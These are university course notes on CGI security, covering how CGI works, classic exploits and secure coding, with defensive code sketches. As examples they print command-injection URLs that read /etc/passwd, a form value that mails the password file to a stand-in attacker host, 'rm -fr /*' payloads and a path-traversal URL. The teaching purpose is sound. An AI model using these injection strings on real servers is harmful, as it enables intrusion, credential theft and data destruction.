CEG 499/699:
Internet Security


College of Engineering & CS
Wright State
Dayton, Ohio 45435-0001

CGI Vulnerabilities

 

Prabhaker Mateti

 
Abstract:  CGI stands for Common Gateway Interface.  A so-called web application is a CGI program written in a compiled language such as C, or an interpreted language such as Perl.  Such an application is split between the web browser client and the web server.  Not only do the more traditional attacks such as buffer overflow work on CGI programs, but simpler exploits are also possible via clever uses of meta characters and manipulation of temporary files. This article is an overview of these CGI vulnerabilities and of how they can be prevented.
 
This work is supported in part by NSF DUE-9951380.
   

Table of Contents

  1. Educational Objectives
  2. Overview of CGI
    1. An Example of How  a CGI Script is Invoked
    2. CGI Meta (Environment) Variables
    3. The GET and POST Methods
    4. Location of CGI Programs
    5. Output of a CGI Program
  3. Typical CGI Exploits
    1. A Phone-Book-Functionality Script Exploit
    2. A Whois Script Exploit
    3. A Simple Shell Breach
    4. An UnHexifying CGI program Exploit
    5. Vulnerability in viewsrc.cgi
    6. Remote buffer overflow in post-query
    7. Other Breaches
  4. Secure the Web Server
    1. Securing the Server Machine
    2. Securing the Web Server Program
    3. Secured Installation of the CGI Scripts
  5. Secure CGI Programming
    1. Validate Scripts Borrowed from the Web
    2. Common Assumptions That Can Be False
    3. Never Accept Unchecked Input
    4. Cookie Caution
    5. Server-side Includes
    6. Redirection of HTTP Requests
    7. OS Environment
    8. Checking the Result Codes
    9. SUID CGI Scripts
    10. C
    11. Shell
    12. Perl
    13. Python
  6. CGI Scanners
  7. Lab Experiment
  8. Acknowledgements
  9. References

1. Educational Objectives

  1. Overall idea of what a CGI program needs to do to function.
  2. Describe vulnerabilities of CGI programs
  3. Describe defensive techniques

2. Overview of CGI

CGI stands for Common Gateway Interface.  The word "gateway" is unrelated to its use in networking as a synonym for routers.  CGI is a standard that allows the web server to execute a separate program in order to generate content, and that programs invoked in this way via a web client are expected to follow. For example,  http://www.example.com/cgi-bin/homepage.pl?user=rob runs the program homepage.pl located in the directory named cgi-bin.  This program is supplied with user=rob in a so-called meta-variable, in order to generate content specific to the user "rob".  Interactive web sites, as well as e-commerce sites, typically use some form of CGI scripting to produce their output.

CGI programs are written in scripting languages such as Perl, Python, and Microsoft ASP, in traditionally compiled languages such as C, as well as in byte-code languages such as Java.  The privileges and the abilities of the CGI program are controlled by the web server, and by file permissions and access control lists.  The triggering URL embeds the user's input, if any.  The URL may be essentially pre-built or built on the fly by an applet running in the web client program. The end result of invoking a CGI program is typically that it returns a string that constitutes a valid HTML page.

The front-end interface to a CGI program is an HTML document called a form. Forms include the HTML tag <INPUT>. Each <INPUT> tag has a variable name associated with it. The contents of the field form the value portion of the variable=value token. Form data is a stream of variable=value pairs separated by the & character.  Actual CGI scripts may perform input filtering on the contents of the <INPUT> field. Another HTML tag sometimes seen in forms is the <SELECT> tag, which allows the user on the client side to select from a finite list of choices.

2.1 An Example of How  a CGI Script is Invoked

The following is an illustration of how a form submission on the client machine generates a triggering URL and how the corresponding CGI program is invoked on the server.

  1. The client fetches the HTML form page from a server.  The form happens to be a simplified version of a form from the search engine Google.


    Here is the HTML code for the above.

    <form action="http://www.google.com/search" method="get" name="f">
    <input type="text" name="q" size="50" maxlength="256"><br>
    <input name="btnG" type="submit" value="Google Search">
    <input name="btnI" type="submit" value="I'm Feeling Lucky">
    </form>

  2. The user fills out the form on the client machine.  The white rectangle above is the input field named q, of type text, with a display size of 50 and an expected maximum length of 256.  Suppose our search request is for "CGI vulnerability scanners".
  3. The user presses "Google Search".  This is the input field named btnG, of type submit, with the value "Google Search", so the browser generates the following URL, which embeds the user's inputs: http://www.google.com/search?q=CGI+vulnerability+scanners&btnG=Google+Search
    The plus character is the traditional representation of a space here.
  4. The request is sent out.
  5. The host named www.google.com receives this request on port 80 and sends it to the http server process.
  6. This process constructs appropriate environment variables with values dictated by q=CGI+vulnerability+scanners&btnG=Google+Search. It then follows its configuration rules to locate the CGI program named search, and invokes it.   This invocation is generally done by forking a child process with the same privileges as the web server, and then exec-ing the program.
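
The encoding in step 3 and the decoding implied by step 6 can be sketched with Python's standard urllib.parse module. This is only an illustration of the variable=value encoding, not a description of how any particular browser or server is implemented.

```python
from urllib.parse import urlencode, parse_qs

# Form fields as the browser would collect them (values from the example above).
fields = {"q": "CGI vulnerability scanners", "btnG": "Google Search"}

# Browser side: encode the fields and append them to the form's action URL.
query = urlencode(fields)
url = "http://www.google.com/search?" + query

# Server side: recover the variable=value pairs from the query string.
decoded = parse_qs(query)

if __name__ == "__main__":
    print(url)
    print(decoded)
```

Note that parse_qs returns a list for each name, because a form may legitimately submit the same name more than once.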

2.2 CGI Meta (Environment) Variables

CGI uses meta variables (formerly called environment variables) to send the CGI program its parameters. Three of these variables (QUERY_STRING, PATH_INFO, and PATH_TRANSLATED) are relevant for us right away.

QUERY_STRING is defined as anything that follows the first ? in the URL. This information could be added either by an ISINDEX document, or by an HTML form (with the GET method). It could also be manually embedded in an HTML anchor.  This string is encoded in the standard URL format of changing spaces to +, and encoding special characters with %xx hexadecimal encoding.  For a query that contains no unencoded = character (an ISINDEX-style query), the web server also parses the query string into the standard argv[] array.  For example, the query string "CGI+vulnerability+scanners" would be given to your program with argv[1]="CGI", argv[2]="vulnerability", and argv[3]="scanners".  Note that a %00 in the QUERY_STRING will be decoded into the string termination character.
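
The decoding rules, including the %00 case, can be tried out with a short Python sketch. The helper names decode_query and has_nul are hypothetical and exist only for this illustration.

```python
from urllib.parse import unquote_plus

def decode_query(raw: str) -> str:
    """Turn '+' into a space and each %xx escape into its character."""
    return unquote_plus(raw)

def has_nul(decoded: str) -> bool:
    """Report whether decoding produced a NUL (string terminator in C)."""
    return "\x00" in decoded

if __name__ == "__main__":
    print(decode_query("CGI+vulnerability+scanners"))
    # A C program that treats the decoded value as a C string would stop
    # reading at the NUL, so it would see only "index.html".
    print(has_nul(decode_query("index.html%00.txt")))
```

A program that checks the decoded value in one language and then hands it to C code may therefore validate one string and act on a shorter one.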

PATH_INFO suggests file locations to the CGI program.  Suppose the URL for a CGI program foobar is http://foo.bar.org/cgi-bin/foobar. Upon receiving the URL  http://foo.bar.org/cgi-bin/foobar/extra/path/info/,  the web server will set PATH_INFO  to "/extra/path/info/".  The server also initializes the PATH_TRANSLATED environment variable to the full path name of "/extra/path/info/" by prepending the path of the DocumentRoot of the server.

2.3 The GET and POST Methods

If  the form has METHOD="GET" in its FORM tag, the CGI program will receive the encoded form input in the environment variable QUERY_STRING.

If  the form has METHOD="POST" in its FORM tag, the CGI program will receive the encoded form input on stdin. However, the end of input must be detected by using the value of  the environment variable CONTENT_LENGTH.
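
A minimal sketch of both cases in Python follows. The function name read_form and the limit MAX_BODY are assumptions made for this example; REQUEST_METHOD, QUERY_STRING, and CONTENT_LENGTH are the standard CGI variables. The input stream is passed in as a parameter so the function can be exercised without a web server; in a real CGI program it would be sys.stdin.buffer and os.environ.

```python
import io
from urllib.parse import parse_qs

MAX_BODY = 64 * 1024  # hypothetical upper bound on an acceptable POST body

def read_form(environ, stdin):
    """Return the form fields as a dict of lists, for GET or POST."""
    method = environ.get("REQUEST_METHOD", "GET").upper()
    if method == "POST":
        try:
            length = int(environ.get("CONTENT_LENGTH", "0"))
        except ValueError:
            raise ValueError("CONTENT_LENGTH is not a number")
        if length < 0 or length > MAX_BODY:
            raise ValueError("CONTENT_LENGTH out of range")
        # Read exactly CONTENT_LENGTH bytes; do not wait for end-of-file.
        raw = stdin.read(length).decode("ascii", errors="replace")
    else:
        raw = environ.get("QUERY_STRING", "")
    return parse_qs(raw, keep_blank_values=True)

if __name__ == "__main__":
    body = b"name=rob&note=two+words"
    env = {"REQUEST_METHOD": "POST", "CONTENT_LENGTH": str(len(body))}
    print(read_form(env, io.BytesIO(body)))
```

Bounding CONTENT_LENGTH before reading is a design choice of this sketch: the value comes from the client and should not be trusted to be reasonable.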

2.4 Location of CGI Programs

Most CGI programs reside in a directory named cgi-bin.  The full path name of this directory can be anything, but a typical web server is configured so that CGI programs appear to be directly under the root, as in /cgi-bin.

2.5 Output of a CGI Program

CGI programs can return a myriad of document types: an image file, an HTML document, a plain text document, an audio clip, etc. They can also return references to other documents. In order to inform the web server what kind of document the CGI program is returning, CGI requires a header consisting of a few lines.  The return types are essentially of two kinds.

  1. A full document with a corresponding MIME type

    In this case, you must tell the server what kind of document you will be outputting via a MIME type. Common MIME types are things such as text/html for HTML, and text/plain for straight ASCII text.

    For example, to send back HTML to the client, the output from CGI program should be:

            Content-type: text/html
    
            <HTML><HEAD>
            <TITLE>HTML output from CGI script</TITLE>
            </HEAD><BODY>
            <H1>Sample output</H1>
            What do you think of <STRONG>this?</STRONG>
            </BODY></HTML>
    
  2. A reference to another document

    Instead of outputting the document, you can just tell the browser where to get the new one, or have the server automatically output the new one for you.

    For example, say you want to reference a file on your Gopher server. In this case, you should know the full URL of what you want to reference and output something like:

            Content-type: text/html
            Location: gopher://httprules.foobar.org/0
    
            <HTML><HEAD>
            <TITLE>Sorry...it moved</TITLE>
            </HEAD><BODY>
            <H1>Go to gopher instead</H1>
            Now available at
            <A HREF="gopher://httprules.foobar.org/0">a new location</A>
            on our gopher server.
            </BODY></HTML>
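
The two kinds of output described above can be produced by small helper functions. The following Python sketch uses hypothetical names (cgi_document and cgi_reference); the one fixed rule it illustrates is that the header lines are separated from the body by an empty line.

```python
def _check_header_value(value: str) -> str:
    """Refuse values that would smuggle extra header lines into the output."""
    if "\r" in value or "\n" in value:
        raise ValueError("line break in header value")
    return value

def cgi_document(body: str, content_type: str = "text/html") -> str:
    """A full document: Content-type header, blank line, then the body."""
    return "Content-type: " + _check_header_value(content_type) + "\n\n" + body

def cgi_reference(url: str) -> str:
    """A reference to another document: Location header, then a blank line."""
    return "Location: " + _check_header_value(url) + "\n\n"

if __name__ == "__main__":
    print(cgi_document("<HTML><BODY><H1>Sample output</H1></BODY></HTML>"))
    print(cgi_reference("gopher://httprules.foobar.org/0"))
```

Rejecting line breaks in header values matters whenever any part of a header is derived from user input.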
    

3. Typical CGI Exploits

CGI programs contain many security holes. Although the CGI protocol is not inherently insecure, CGI programs must be written with as much care as any other program that may be invoked by untrusted users with deviously constructed inputs.  It is also typical that Web administrators are less skilled in security matters than the typical system administrators, and install CGI programs at their sites without realizing the associated problems. The vulnerabilities caused by the use of CGI scripts are not weaknesses in CGI itself, but are weaknesses inherent in the HTTP specification and in various system programs. CGI simply allows easier access to those vulnerabilities. There are, of course, other ways to exploit. For example, insecure file permissions can be exploited using FTP or telnet.

CGI exploits take advantage of weaknesses in the web server.  By definition, a CGI exploit does not "work" on the client.  Exploits on the web client side are, of course, possible via applets (in Java, JavaScript, ActiveX, VBScript, etc).

The CGI specification permits reading files, and acquiring shell access.  A clever script can corrupt file systems on server machines and their attached hosts. Past CGI exploits have caused unauthorized manipulation (removing, inserting, or altering) of data on the Web server, reduced performance, halted services, and used the Web server as a Trojan horse into other systems, including the local intranet.  Means of gaining access include exploiting assumptions that the script makes but does not check, exploiting weaknesses in the server environment, and exploiting weaknesses in other programs and system calls. The primary weakness in CGI scripts is insufficient input validation.

The Appendix titled A List of Specific CGI Scripts Exploited gives a fairly complete list as of June 2001.  Below we describe a few selected examples so that the reader has better appreciation of the issues.

3.1 A Phone-Book-Functionality Script Exploit

The most notorious of the CGI vulnerabilities are due to sloppy filtering of the user input. This vulnerability allows an attacker to execute any command on a Web server with the permissions of the process running the Web server.

The "phone book functionality" (PHF) script uses a form-based interface to get a name as input and look the name and address information up on the server. The exploit described here uses it to display the password file (as a Web page), which can then be run through a cracker (like crack).  The script was included as a CGI example with the NCSA and Apache httpd servers.

Unfortunately, the PHF script did an incomplete job of checking its inputs for tricks. The script used a call to escape_shell_cmd(), a function that was supposed to cleanse input of "special characters." The function failed to check for one particular character, the newline character (\n or 0x0a). A knowledgeable attacker can thus provide input to the form (through a URL) that includes a newline character. So a  URL such as

http://www.university.edu/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd

passes the filtration unchanged.  The /bin/cat /etc/passwd pushes the content of the local (i.e., on the web server) password file to the client.
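
The effect of the missing newline check can be reproduced with a small Python sketch. The function escape_flawed is a hypothetical stand-in written for this illustration, not the NCSA source, and its metacharacter set is an assumption; the stricter alternative shown next to it simply refuses control characters instead of trying to escape them.

```python
from urllib.parse import unquote

# Assumed metacharacter set for illustration; the newline is deliberately
# absent, mirroring the omission described above.
FLAWED_META = set(";<>*|`&$!#()[]{}:'\"")

def escape_flawed(value: str) -> str:
    """Backslash-escape the listed metacharacters and nothing else."""
    return "".join("\\" + ch if ch in FLAWED_META else ch for ch in value)

def reject_control_chars(value: str) -> str:
    """Stricter alternative: refuse any control character, newline included."""
    if any(ord(ch) < 0x20 or ord(ch) == 0x7F for ch in value):
        raise ValueError("control character in input")
    return value

# The value of Qalias after the server decodes the %xx escapes.
decoded = unquote("x%0a/bin/cat%20/etc/passwd")

if __name__ == "__main__":
    print(repr(escape_flawed(decoded)))  # the newline survives untouched
```

Because the newline survives, a shell that later receives this string sees two command lines rather than one argument.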

The PHF script was so widely exploited that most intrusion detection tools now check for its presence.

3.2 A Whois Script Exploit

A prime example of a security risk is a form that allows one to enter arbitrary system commands. A "whois" CGI script can be written that passes the supplied domain name directly to the "whois" system command and returns the information about that domain name. Since the name becomes part of a UNIX shell command line, one could enter something like "; rm -fr /*", which would remove every file on the Web server that the Web server user owns, including log files, and would not perform the intended function of looking up a domain name. A properly written script of this type would check that the input is a valid domain name, containing only alphanumeric characters delimited by periods, before making the call to "whois".
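
The check described above, alphanumeric labels separated by periods, might look like the following in Python. The name is_valid_domain and the 253-character limit are assumptions of this sketch, and the pattern is intentionally as strict as the text suggests, so it also rejects hyphenated names that are legal in real domain names.

```python
import re

# One or more alphanumeric labels separated by single periods.
DOMAIN_RE = re.compile(r"[A-Za-z0-9]+(\.[A-Za-z0-9]+)*")

def is_valid_domain(name: str) -> bool:
    """Accept only names made of alphanumeric labels joined by periods."""
    return len(name) <= 253 and DOMAIN_RE.fullmatch(name) is not None

if __name__ == "__main__":
    for candidate in ["example.com", "; rm -fr /*", "a..b", "example.com\n"]:
        print(repr(candidate), is_valid_domain(candidate))
```

Using fullmatch rather than a search means the whole input must fit the pattern, so a trailing newline or an appended command is rejected rather than ignored.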

3.3 A Simple Shell Breach

Suppose a form lets a user e-mail a message to a specified person. The HTML form page will include code like the following:

  <INPUT TYPE="radio" NAME="send_to" VALUE="pmateti@cs.wright.edu">Mateti<br>
  <INPUT TYPE="radio" NAME="send_to" VALUE="lball@lanl.gov">Lucille Ball<br>
  <INPUT TYPE="radio" NAME="send_to" VALUE="gburns@lanl.gov">George Burns

Now let's say we execute a script that writes the message to a temporary file and then e-mails that file to the selected address. In Perl, this could be done with

  system("/usr/lib/sendmail -t $send_to < $temp_file");

As long as the user selects from the addresses that are given, everything will work fine. There is, however, no way to be sure of that. Because the HTML form itself has been transferred to the user's client machine, he/she is free to edit it to read something like

  <INPUT TYPE="radio" NAME="send_to" VALUE="aarkin@lanl.gov;mail badguy@evil-empire.org </etc/passwd"> Alan Arkin<br>

As soon as this gets sent, the shell ends the sendmail command at the semicolon and executes the next command, which mails the password file to the attacker, who could then run a password cracker on it and use the results to gain login access to your machine.
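
One way to close this hole is to accept only the addresses that the form actually offered and to start sendmail without a shell. The Python sketch below assumes the three addresses from the form above as the allow-list; the function names are hypothetical, and the sendmail path and -t flag are simply carried over from the Perl line in the text.

```python
import subprocess

# The only recipients the form is supposed to offer.
ALLOWED_RECIPIENTS = {
    "pmateti@cs.wright.edu",
    "lball@lanl.gov",
    "gburns@lanl.gov",
}

def sendmail_argv(send_to: str) -> list:
    """Build the argument vector, refusing any address not on the list."""
    if send_to not in ALLOWED_RECIPIENTS:
        raise ValueError("recipient not permitted")
    return ["/usr/lib/sendmail", "-t", send_to]

def send_message(send_to: str, message: bytes) -> None:
    """Run sendmail directly; no shell ever parses the address."""
    subprocess.run(sendmail_argv(send_to), input=message, check=True)

if __name__ == "__main__":
    print(sendmail_argv("lball@lanl.gov"))
```

Passing the message on standard input also removes the need for the temporary file used in the original script.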

3.4 An Exploit of UnHexifying

This Perl program decodes the %xx hexadecimal escapes in a URL into the characters they represent and echoes the result.  It is similar to the "echo" command (a built-in of bash).

  #!/usr/bin/perl
  # usage: http://your.host/cgi-bin/echo?

  # Echos back the QUERY_STRING to the user.


  $| = 1;
  $in = $ENV{'QUERY_STRING'};
  $in =~ s/%(..)/pack("c",hex($1))/ge;

  # Escape the nasty metacharacters
  # (List courtesy of http://www.cerf.net/~paulp/cgi-security/safe-cgi.txt)
  $in =~ s/([;<>\*\|`&\$!#\(\)\[\]\{\}:'"])/\\$1/g;

  print "Content-type: text/html\n\n";
  system("/bin/echo $in");   

Install this program in cgi-bin/echo and the URL

     http://your.host/cgi-bin/echo?hello%20there 

will return a page containing the text

"hello there"

By inserting %0A, the code for the newline character (the %20 represents a blank), which is not in the list of escaped metacharacters, one can exploit the shell to run any command.  For example, the URL

     http://your.host/cgi-bin/echo?%0Acat%20/etc/passwd

will bring in a page with a copy of the /etc/passwd file.
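
The same functionality needs no shell at all. A minimal Python sketch, assuming a hypothetical function name echo_page, decodes the query string and writes it back as escaped HTML text, so a newline or any other metacharacter is only ever data.

```python
import html
from urllib.parse import unquote

def echo_page(query_string: str) -> str:
    """Return the CGI output that echoes the decoded query string."""
    text = unquote(query_string)
    # html.escape keeps the echoed text from being parsed as markup.
    return "Content-type: text/html\n\n" + html.escape(text) + "\n"

if __name__ == "__main__":
    print(echo_page("hello%20there"))
    print(echo_page("%0Acat%20/etc/passwd"))
```

With this version, the second URL merely echoes the words "cat /etc/passwd" back to the client.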

3.5 Vulnerability in viewsrc.cgi

[Posted on 24.5.2001 by joetesta@hushmail.com.  This is an example of how a vulnerability and its fix are generally described.]

viewsrc.cgi v2.0 is a source-code viewing CGI script available from http://www.mimanet.com/scripts. A vulnerability exists which allows a remote user to view any file on the server. The following URL demonstrates the problem: http://localhost/cgi-bin/viewsrc.cgi?loc=../[any file outside restricted dir]

Apply the following patch to viewsrc.cgi:

53a54,56
>$FORM{'loc'} =~ s/\.\.//g;
>$FORM{'loc'} =~ s/\\//g;
>$FORM{'loc'} =~ s/\///g;
65c68
<open (INHTML, "$predo") or die &err_loc;
---
>open (INHTML, "<$predo") or die &err_loc;

This patch removes any '..', '/', or '\'s present in the $FORM{'loc'} variable. It also makes the open() command safer by using the '<' read-only specifier.
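
An alternative to stripping characters is to resolve the requested name and verify that the result still lies inside the directory being served. The following Python sketch shows that technique; the function name resolve_inside is hypothetical, and this is a different approach from the posted patch, not a translation of it.

```python
import os

def resolve_inside(base_dir: str, requested: str) -> str:
    """Return the absolute path of requested, or raise if it escapes base_dir."""
    base = os.path.realpath(base_dir)
    # realpath collapses ".." components and follows symbolic links.
    target = os.path.realpath(os.path.join(base, requested))
    if os.path.commonpath([base, target]) != base:
        raise ValueError("path escapes the permitted directory")
    return target

if __name__ == "__main__":
    print(resolve_inside("/tmp", "viewsrc.cgi"))
    try:
        resolve_inside("/tmp", "../etc/passwd")
    except ValueError as err:
        print("rejected:", err)
```

Checking the resolved path also covers absolute names and symbolic links, which character stripping alone does not address.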

Vendor Status:  MIMAnet was contacted via <webmaster@mimanet.com> on Tuesday, May 1, 2001. Roberto R. Morelli <morelli@altair7.com> quickly replied and stated that the problem was verified and an official fix would be released. Twenty two days have passed, and nothing has been done.

3.6 Remote buffer overflow in post-query

[Posted on 11.5.2001; http://www.energymech.net/users/proton/]

The overflow condition is very easily exploitable, since the code actually supplies the pointer to the exploit code itself, odd as it may seem. The pointer thusly does not need to be second-guessed at all, making life much easier for crackers.

#define MAX_ENTRIES 10000


typedef struct {
	char *name;
	char *val;
} entry;

...

main (int argc, char *argv[])
{
	entry entries[MAX_ENTRIES];
	...
	for(x=0; cl && (!feof(stdin)); x++) {
		m=x;
		entries[x].val = fmakeword(stdin,'&',&cl);
		plustospace(entries[x].val);
		unescape_url(entries[x].val);
		entries[x].name = makeword(entries[x].val,'=');
	}
}
"Fellow C programmers would surely see the problem right away. By feeding 10,000 bogus entries, and then sending a specially prepared buffer for the 10,001'th, you get a situation where memory is allocated, the exploit code is written into it and the pointer is then put into the 10,001'st position of the entries struct. This happens to be the position of the return pointer. When the program ends, it does not call `exit' as I would say most network applications should, instead it returns to __start, or in a case where the return pointer has been overwritten, it returns to the user-supplied code. The only problem with this exploit is that `fmakeword' allocates 102400 bytes for each buffer. Before you think that the problem then becomes entirely theoretical, consider that most modern kernels do not give the programs actual physical memory until the memory is written to. A fair estimate would be that to be vulnerable the server would need around 40-50MB of physical and/or virtual memory, but I cant say for certain. To sum it up, this exploit is real, you may be vulnerable if you have the post-query CGI on your web servers (and it is *very* common). You may be lucky enough to have an OS that prohibits the application from successfully allocating the needed memory. Better safe than sorry; Remove the program if you have it! No one should really need this type of application since it is a sample program designed to demonstrate how CGI works."

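The check that the loop above lacks is a bound on the number of entries. Python lists are bounds-checked, so the sketch below cannot reproduce the overflow; it only illustrates the missing test, using a hypothetical function parse_entries and the same MAX_ENTRIES limit as the C code.

```python
MAX_ENTRIES = 10000

def parse_entries(body: str, max_entries: int = MAX_ENTRIES) -> list:
    """Split form data into (name, value) pairs, refusing excess entries."""
    entries = []
    for token in body.split("&"):
        if not token:
            continue
        # The equivalent of testing x < MAX_ENTRIES before storing entries[x].
        if len(entries) >= max_entries:
            raise ValueError("too many form entries")
        name, _, value = token.partition("=")
        entries.append((name, value))
    return entries

if __name__ == "__main__":
    print(parse_entries("a=1&b=2"))
```

In the C program the corresponding fix would be to add the bound to the loop condition and to treat excess input as an error.
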
3.7 Other Breaches

A number of other vulnerabilities are due to weaknesses inherent in certain programs that are typically invoked by CGI programs.

4. Secure the Web Server

4.1 Securing the Server Machine

Start with a properly configured server, applying all the recommendations of [Mateti 2001]. This includes appropriate screening at the router, turning off un-needed daemons, and restricting the file system. Additional precautions may be required, depending upon the partition in which you are working, who the intended audience is, and the sensitivity level of the data on the machine. These precautions include monitoring who accesses the scripts and the other activities those users perform, and consulting with your computer security officer as needed.

4.2 Securing the Web Server Program

  1. Do not run web servers as root.  Create an ordinary unprivileged pseudo-user login id, typically named www, and a group www.
  2. Don't configure CGI support on Web servers that don't need it.
  3. Get rid of CGI script interpreters in cgi-bin directories: http://www.cert.org/advisories/CA-96.11.interpreters_in_cgi_bin_dir.html
  4. Run your Web server in a chroot()ed environment to protect the machine against yet-to-be-discovered exploits.

4.2.1 Apache

4.2.2 IIS

4.2.3 MS Personal Web Server

4.2.4 Zope

4.3 Secured Installation of the CGI Scripts

  1. Remove unsafe CGI scripts.  Widely-exploited CGI scripts include: Count.cgi, test-cgi, php.cgi, handler, webgais, websendmail, webdist.cgi, faxsurvey, htmlscript, pfdisplay, perl.exe, wwwboard.pl, www-sql, service.pwd, users.pwd, aglimpse, man.sh, view-source, campas, and nph-test-cgi. Simple scanning tools like cgiscan look for these problematic scripts in the usual location. See the list in the Appendix.

  2. Note that successful input validation attacks have been seen against ASP and Cold Fusion Markup Language (CFML) programs as well, so cgi-bin alone is not the only server-side functionality that introduces security problems. If you have to provide server-side programs, think carefully about how you handle input.

5. Secure CGI Programming

5.1 Validate Scripts Borrowed from the Web

There are many CGI archive sites on the web, but many of them do not take security concerns seriously. Before installing a script, system administrators should evaluate the CGI code by reading it and should test the CGIs using web page forms. Tests should invoke commands on the system which, if successful, leave an observable change in the system or file volume. For example, one such test is the creation of a harmless file. Assume the server is running as user ``nobody''.  The typical /tmp directory is world-writeable. A harmless test is touch /tmp/gotcha. This command would simply create a file named ``gotcha'' in the /tmp directory. Some examples of URLs that might be sent to a CGI program are:
http://myserver/cgi-bin/finger?dave; touch%20/tmp/gotcha
http://myserver/cgi-bin/finger?dave; touch+/tmp/gotcha

If it is possible to send a form or URL that successfully executes this command, then in principle any command-line argument could be sent. The CGI script should then be reworked until it is not possible to send any unwanted system command.

5.2 Common But Invalid Assumptions

  1. HTTP_REFERER indicates what web page the user previously visited. This header is submitted depending on the choices made in the web browser. It can be spoofed or otherwise manipulated. A common oversight is to depend on the Referer header to restrict incoming application requests to a certain subset of HTML pages or determine a course of action based on from where the application requests are referred.
  2. <input type="hidden"> elements are really hidden.  An application "hides" passwords, credit-card numbers and other sensitive information in these tags. This element is submitted along with the user data back to the CGI application, but the element is not shown to the user.  However, most browsers let you view the HTML source. You can see the <input type="hidden" value="sensitive info"> tag, along with the sensitive information. The solution is to assume hidden information is not private, and to make sure all sensitive information is transmitted over SSL.
  3. <input type="password"> is secure for handling passwords.  Similar to the hidden form element, the password form element provides an input box that permits a user to enter sensitive information that does not echo back on the screen. Unfortunately, when the user finally sends the information, it travels to the server in clear text. If the form uses the get method, the password travels as part of the URL permitting everything from the user's local browser to Web proxies to save a copy of the password. The password may even appear in the Web server's request log. Therefore, your application should not use the get method when dealing with sensitive form information.
     
  4. All submitted data will be coming from our own Web applications and HTML pages. "It's important to understand how HTTP works: The user contacts your server and retrieves the HTML with the form parameters (which input boxes to show, which radio buttons to select and so on). The user disconnects from the Web server, enters/manipulates the form data, and finally makes another request to your server to send back the data. The key is that there's no guarantee that because you sent three input boxes to the user, you'll receive three input boxes back. Since the user is sending you the form data unrelated to any other server connection, he or she can submit more or less data without constraints. This means your application needs to check carefully to see if all required form elements are returned." 
  5. <input size=##> allows the application to limit the amount of incoming data.  The size parameter should be thought of as a suggestion for the maximum amount of data the user may send. But since it's only a suggestion, the user isn't required to abide by it. An attacker can use custom browsers and submission scripts that submit whatever data the attacker wishes, regardless of size restraints. Your application should verify the amount of incoming data. 
  6. Client-side JavaScript/VBScript validation will help remove bad data. An attacker can submit data using custom browsers or other programs. Also, most browsers permit turning off Web scripting, thus defeating client side validation routines. Your application must contain all the logic needed to validate data. 
  7. We can limit user selections by providing list boxes and drop-down menus. HTML provides the <SELECT> tag to let a Web page present a menu list of choices. For example, the menu choices may be "Aleph1," "Mnemonix" and "RFP." However, there's no guarantee that the returned answer is any of those choices. Your Web application must verify that the returned choice is one from the list.
  8. The fields in the QUERY_STRING variable will match the ones in my page, and the QUERY_STRING variable will correspond to something that could be validly transmitted under the HTTP specifications. Neither is guaranteed, since the client can send an arbitrary request.
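
Several of the points above reduce to the same rule: the server must re-check everything the form was supposed to enforce. A minimal Python sketch follows, assuming a hypothetical form with two fields named choice and comment; the menu values are the ones from item 7, and the 256-character limit is an assumption.

```python
ALLOWED_CHOICES = {"Aleph1", "Mnemonix", "RFP"}   # the <SELECT> options
REQUIRED_FIELDS = {"choice", "comment"}           # hypothetical field names
MAX_COMMENT_LEN = 256                             # assumed server-side limit

def validate_form(form: dict) -> dict:
    """Check field names, menu value, and length on the server side."""
    names = set(form)
    if names != REQUIRED_FIELDS:
        raise ValueError("missing or unexpected form fields")
    if form["choice"] not in ALLOWED_CHOICES:
        raise ValueError("choice is not one of the offered options")
    if len(form["comment"]) > MAX_COMMENT_LEN:
        raise ValueError("comment too long")
    return form

if __name__ == "__main__":
    print(validate_form({"choice": "RFP", "comment": "hello"}))
```

None of these checks relies on the browser honoring the form's size limits, its menu, or any client-side script.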

5.3 Validate All Arguments and Inputs Passed

CGI programs are called with user given inputs as arguments.  These arguments must be analyzed for actual data expected for each incoming entry. For instance, the syntax of a phone number, a monetary amount, a name, a mailing address and so on, can all be rigorously described using formal language grammars. 

The input given may contain meta-characters, such as dot, comma, semicolon, slash, exclamation etc.  Make sure that these are permissible in the given context.  The following characters in user-supplied data should be examined carefully, and if suspect, should be "escaped":

      ;<>*|`&$!#()[]{}:'"/\n

For server-side includes, check for "<" and ">" in order to identify and validate any embedded HTML tags.

Disallow slashes, dots, etc. Look for any occurrence of "/../" (which might indicate that the user is attempting to access higher levels of the directory structure).
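
Both checks can be sketched in a few lines of Python. The function names are hypothetical; the character set is the one listed above, with \n standing for the newline character.

```python
# The metacharacters listed above; "\n" is the newline character.
META = set(";<>*|`&$!#()[]{}:'\"/\n")

def suspicious_chars(value: str) -> list:
    """Return the metacharacters that occur in value, in sorted order."""
    return sorted(set(value) & META)

def climbs_directories(path: str) -> bool:
    """True if any component of path is '..', with either kind of slash."""
    return ".." in path.replace("\\", "/").split("/")

if __name__ == "__main__":
    print(suspicious_chars("dave; touch /tmp/gotcha"))
    print(climbs_directories("docs/../../etc/passwd"))
```

Where the expected input has a simple form, it is usually safer to accept only what matches that form than to hunt for known-bad characters.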

5.4 Calling Other Programs

CGI applications have to be careful when passing user data on the command line for calls to other programs. An attacker can trick your application into executing extra commands or modifying parameters of running programs by submitting data that will be interpreted as command-line switches or options.

Suppose you are invoking grep on a text database and that a form provides the regular expression.  The naïve approach

  system("grep $exp database");

or the equivalent has a number of problems. What if exp has the value "root /etc/passwd;rm"? Not only does it grep the wrong file, it also deletes the real database.

  system("grep \"$exp\" database");

Neither double nor single quotes actually solve the problem. E.g., with double quotes exp could be "`rm -rf /`". Single quotes avoid this, but both suffer from inputs like "'root /etc/passwd;rm'": the quotation marks in the input match the ones that enclose the variable, completely negating their effect.

  system("grep", "-e", $exp, "database");

It is unnecessary to escape characters if you invoke programs as above, because the list form of system does not involve a shell. If a shell must be used, escape every character that is not known to be harmless:

  $exp =~ s/([^\w])/\\$1/g; system("grep \"$exp\" database");

or

  for (i=0,p=tmp2;exp[i];i++) {
  	if (!normal(exp[i])) *(p++)='\\';
  	*(p++)=exp[i];
  }
  *p=0;
  sprintf(tmp, "grep \"%s\" database", tmp2);
  system(tmp);

The above solutions handle the quoting problems discussed so far, but they do not handle arguments that look like options. E.g., if exp were -i, grep would try to find the string "database" in its standard input. Using the "-e" option to grep would prevent this. In general you never want to call a program that cannot tell that an argument isn't a switch unless you can restrict the possible values for exp. GNU utilities are really good this way since they specify "--" as an end of switch marker.
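
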